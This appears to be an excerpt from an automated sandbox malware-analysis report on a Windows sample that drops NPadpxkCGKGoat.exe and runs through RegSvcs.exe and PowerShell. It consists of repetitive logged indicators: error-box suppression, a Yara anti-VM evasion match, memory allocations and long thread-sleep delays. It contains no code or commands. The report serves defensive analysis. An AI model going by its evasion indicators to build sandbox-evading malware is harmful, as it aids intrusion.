Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: file.exe PID: 6784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: NPadpxkCGKGoat.exe PID: 7236, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 11E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 52B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 62B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 63E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 73E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: AA10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: BA10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: BEA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: CEA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory allocated: 2560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory allocated: 25A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory allocated: 45A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory allocated: 4CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory allocated: 5CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory allocated: 5DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory allocated: 6DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory allocated: 9B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory allocated: AB20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory allocated: AFB0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599305	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598683
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598202
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594391
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594172

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6976	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2967	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6855	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2250

Source: C:\Users\user\Desktop\file.exe TID: 6860	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1508	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe TID: 7264	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599305	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
